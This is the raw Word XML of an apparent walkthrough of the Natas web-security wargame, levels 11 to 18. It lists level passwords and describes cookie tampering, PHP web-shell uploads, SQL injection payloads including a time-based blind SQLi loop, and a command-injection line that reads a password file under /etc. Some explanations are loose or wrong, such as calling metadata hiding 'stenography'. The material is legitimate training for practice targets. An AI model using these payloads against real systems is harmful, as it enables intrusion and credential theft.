    </w:p>
    <w:p w14:paraId="05C4CCA7" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EBDCE3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Level 11 --&gt; Level 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1885CF7A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Username: natas12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60753B15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Password: yZdkjAYZRd3R7tq7T5kXMjMJIOIkzDeB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C688493" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B2BD1E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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040DE6D8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this page tells about cookies and secret codes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245D8FC3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go to the  DevTools --&gt; Application --&gt; Cookies --&gt; find the data cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3460F485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encoded the value of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06917381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View Source --&gt; shows the cookie is XOR encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1508BF88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Writen a small Python script to decrypt the cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA88992" w14:textId="43AA3354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 xml:space="preserve">Flip the </w:t>
      </w:r>
      <w:r w:rsidR="0057696B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>showpassword</w:t>
      </w:r>
      <w:r w:rsidR="0057696B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> value to </w:t>
      </w:r>
      <w:r w:rsidR="0057696B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidR="0057696B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>, re-encrypt it and then set the cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB24C40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then refresh --&gt; you will got the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62242584" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC012DF" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00980E0D" w:rsidRDefault="0024263C" w:rsidP="00980E0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00980E0D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A0A74A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 xml:space="preserve">Python Script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E9726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Browser DevTools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083981C6" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="00980E0D"/>
    <w:p w14:paraId="21342AE0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lastRenderedPageBreak/>
        <w:t>Logic:By decoding and modifying the cookie, we can act as an admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695D91B7" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45ABF81D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Level 12 --&gt; Level 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A5A2E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Username: natas13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32429B43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Password: trbs5pCjCrkuSknBBKHhaBxq6Wmlj3LC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404B1941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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14AA22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Page says upload an image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF93D2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right click --&gt; View Source --&gt; there is file type that allows the submission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3966C558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created a file named shell.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AD8395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renamed it by shell.jpg.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399DB0F6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uplod the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719AB24B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it shows some link after clicking on that it will show the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B6DAC9" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF42E75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Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A70564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Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43867A5C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php script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910FBA2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php Text editor online tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B923205" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7295BE2F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Logic:file validation is already mention in the source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ADFF24" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2201D7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lastRenderedPageBreak/>
        <w:t>Level 13 --&gt; Level 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AD4F06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Username: natas14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BD82AF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 xml:space="preserve">Password: z3UYcr4v4uBpeX8f7EZbMHIzK4UR2XtQ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4B1D75" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B5FFF4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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B28F415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Same upload page again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D288534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create a valid image file with PHP inside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668ACF84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Use ExifTool to add PHP code into image metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7647DA8F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Upload the crafted image, access the file URL, and read the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D989776" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F758EB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Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291AFB0D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 xml:space="preserve">ExifTool </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1DE6BC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Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152978F1" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73116354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Logic: This method is called as stenography.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1C8D0A" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5BBED4" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B4B125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Level 14--&gt; Level 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FCA205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Username: natas15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE081E4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Password: SdqIqBsFcz3yotlNYErZSZwblkm0lrvx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E3ED22" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B0CFB02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lastRenderedPageBreak/>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C064468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Login form asking for username and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777B2AF6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View Source --&gt; form submits directly to server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2C0FC2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 xml:space="preserve">Try SQL Injection in the username field --&gt; natas14" OR "1"="1" -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746570FF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got the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ACD993" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C23CED1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 xml:space="preserve">Tools Used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C20FDA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Browser,SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E6F5A4" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6A4715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Logic:The SQL trick makes the query always true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E35B470" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D58154A" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5735813D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Level 15 --&gt; Level 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AABD455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Username: natas16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFD8C2E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Password:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F7AF9B" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A18A08E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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD439DC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Login page asks for a username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BC7156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Server checks if username exists but doesn't show output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05549D81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View Source --&gt; no hints given.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2B0641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lastRenderedPageBreak/>
        <w:t>Try Blind SQL Injection to guess the password character-by-character.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9B9B6A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 xml:space="preserve">natas16" AND password LIKE BINARY "a%" -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA62D5E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If the page says "This user exists." it means correct starting character.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75272C5D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You can faster the guessing using a simple curl + bash loop to speed up the guessing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADDD4FB" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B40A249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Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699EA328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Browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E6312B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curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF8E6DB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 xml:space="preserve">Bash script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BD4E27" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6C0BE8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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32117FAD" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SQL Injection helps check each character precisely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBB63FD" w14:textId="77777777" w:rsidR="00946301" w:rsidRDefault="00946301">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="107AFBB8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NATAS WARGAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59177EC2" w14:textId="62A48835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 xml:space="preserve">Level 16 </w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7566CC2A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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B3527C" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00E9516B" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Use $() to bypass filters: $(cat /etc/natas_webpass/natas17)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11700FD4" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00BF526D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The app executes cat inside grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and will</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> leak the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131BF503" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00E9516B" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Tools Used: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E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Browser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Basic Linux Command  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32932206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 xml:space="preserve">Logic: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D00EB" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00BF526D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF526D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Common injection command is used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29690ED0" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00E9516B" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6A1A6E" w14:textId="6BE3CB0D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Level 17</w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 18 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0784B1C6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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A4BB2C" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00E9516B" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Write a script to test each character:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AD29FA" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00E9516B" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>for char in 'abcdef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>0123456789':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38302EFE" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00E9516B" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    payload = f'natas18" AND IF(password LIKE "{found}{char}%", SLEEP(3), 0) -- '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B879194" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00E9516B" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE8A34D" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>If delay &gt;3s, keep the character.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CD6DDB" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00BF526D" w:rsidRDefault="0024263C" w:rsidP="0024263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It will show the letters one by one after 3 s until full password is found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC3CD4" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00E9516B" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Tools Used: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E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Python Script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E9516B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</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>,VS code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB67BC9" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00BF526D" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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Logic: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E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Brute-force password using: sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B7C815" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00E9516B" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9516B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">natas18" AND IF(password LIKE 'a%', SLEEP(3), 0) -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23837D10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Level 18 – Level 19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06618178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Steps :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B083FA" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
